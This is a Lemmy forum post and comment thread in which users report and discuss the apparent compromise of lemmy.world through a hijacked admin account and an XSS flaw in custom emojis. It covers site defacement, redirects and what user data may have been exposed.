Original Post:

https://lemmy.dbzer0.com/post/536477

Title:

PSA: Lemmy.world has been compromised!

Post:

FYI!!! In case you start getting re-directed to porn sites.

Maybe the admin got hacked?

Images:

First, some random video show up, I’m not gonna watch it in case its NSFL content.

Second, the website tries to redirect me, but uBlock Origin blocked it

The Front Page

Side Bar got messed up.

Everything else seems fine, here is the signup page with the Lemmy Version visible.

Also notable comment from the Original Post:

Yea, I switched to this alt. It appears to be one of the assistant admins accts. Seems like an old fashioned anon prank, to me, they’re mainly just trying to make stuff offensive and redirect people to lemonparty.

So, y’know, old school.

I don’t know if any data is actually in danger, but I doubt it. I don’t see why assistant admins would need access to it.

Edit: Someone else said an admin’s credentials was compromised:

One of the admin accounts appears to have been compromised. The owner/other admins appear to be aware now because that account had its admin access revoked and offending posts are being removed.

Definitely opens up a big question about the security of Lemmy instances that I am sure will be discussed over the next few days.

@[email protected] be careful with making admins. And secure your passwords, use 2fa, etc…

Edit 2: Now the entire front page is filled with posts regarding the lemmy.world hack. Interesting…

https://i.imgur.com/VvxiphP.jpg

Edit 3: Lol a post was made from the hacked account claiming the hack was fixed, but that account is still under the hacker’s control:

https://archive.is/hRytN

Edit 4: Lol this is actually funny:

https://archive.is/wbQ2f

“Site has been seized by Reddit for Copyright Infringement” Lmfao

Edit 5: threads was put on an allowlist, and lemmy.ml was put on a block list, every thing else is under “linked instances”. I wasn’t quick enough to get a screenshot or an archive link.

Edit 6: lemmy.blahaj.zone just got hacked too!

I urge all instance admins to temporary defederate from lemmy.world and lemmy.blahaj.zone as a safety precaution.

  • db0M
    link
    fedilink
    English
    161 year ago

    The XSS was due to custom emojis. We had some, but the attacker needed a local account to perform the exploit and either they were discouraged by our application registration, or didn’t pass it as I didn’t see anything worrying here. We have removed the custom emojis now so hopefully we’re safe.

    • @3rdBlueWizard
      link
      English
      31 year ago

      Can you clarify? If my instance doesn’t have custom emojis, it’s safe?

    • Machinist3359
      link
      fedilink
      81 year ago

      One of many nice aspects of the fediverse, it’s not a software monoculture that can be wiped out by a single exploit.

      • YMS
        link
        fedilink
        31 year ago

        But on the downside, as long as it is a vulnerability that’s not instance-specific or could be federated, you’ll have to investigate not one network / database / server cluster / software stack / user group / etc., but possibly hundreds or thousands, operated by mostly amateurs with very different levels of knowledge, living in very different time zones, having different availability.

  • @[email protected]
    link
    fedilink
    English
    51 year ago

    I don’t know if any data is actually in danger, but I doubt it. I don’t see why assistant admins would need access to it.

    What data do admins of a Lemmy instance have access to? Email addresses and login IP?

    I believe the most recent Lemmy update changed it so content deleted by users is deleted after 30 days now instead of kept indefinitely.

    • burrp
      link
      fedilink
      English
      91 year ago

      Test User screenshot

      This is the view an admin has for a user via the existing Lemmy web UI. No email or IP is visible.

      The user’s data would only be available to someone with direct access to the database.

        • burrp
          link
          fedilink
          English
          31 year ago

          Correct, anyone who has shell access to the server(s) the instance is running on could query the database.

  • @[email protected]
    link
    fedilink
    English
    2
    edit-2
    1 year ago

    well that really ruins my trust with lemmy.world… hope data isnt in danger

    Edit: I now know this was a general security issue with the entirety of lemmy… not just lemmy.world, my bad.

      • @[email protected]
        link
        fedilink
        English
        61 year ago

        Data most definitely exists on the server. It has to be stored somewhere. Email is federated, too, but your inbox can certainly reach a limit of its allotted storage.

        • @[email protected]
          link
          fedilink
          English
          01 year ago

          What’s a database?

          Jokes aside, beehaw deferderated from them for spam/aggression reasons then this. Ouch

          Granted their userbase exploded but it does seem interesting.

          • @[email protected]
            link
            fedilink
            English
            0
            edit-2
            1 year ago

            Also not saying they are responsible. I’m just curious if they saw the calm before the storm.

            Edit: The app that I pay nothing for and have not contributed towards doesn’t allow comment editing and I had to result to the web. Lol please play the tiniest violin for me as I struggle through these hard times. 🤣🤣🤣🤣

            • 001100 010010OP
              link
              fedilink
              English
              31 year ago

              Lol I never even used an app, I’ve been using browser since June 12.

      • @[email protected]
        link
        fedilink
        English
        31 year ago

        from the official statement from lemmy.world: “Update While we believe the admins accounts were what they were after, it could be that other users accounts were compromised. Your cookie could have been ‘stolen’ and the hacker could have had access to your account, creating posts and comments under your name, and accessing/changing your settings (which shows your e-mail).”

        So yes, they very well could get my information, I dont think you know how shit works.

  • @Jenner8
    link
    English
    01 year ago

    Removed by mod

  • @Jenner8
    link
    English
    -11 year ago

    Removed by mod

  • @Jenner8
    link
    English
    -21 year ago

    Removed by mod

  • CALIGVLA
    link
    fedilink
    English
    -31 year ago

    You know, maybe beehaw had a point. Just saying.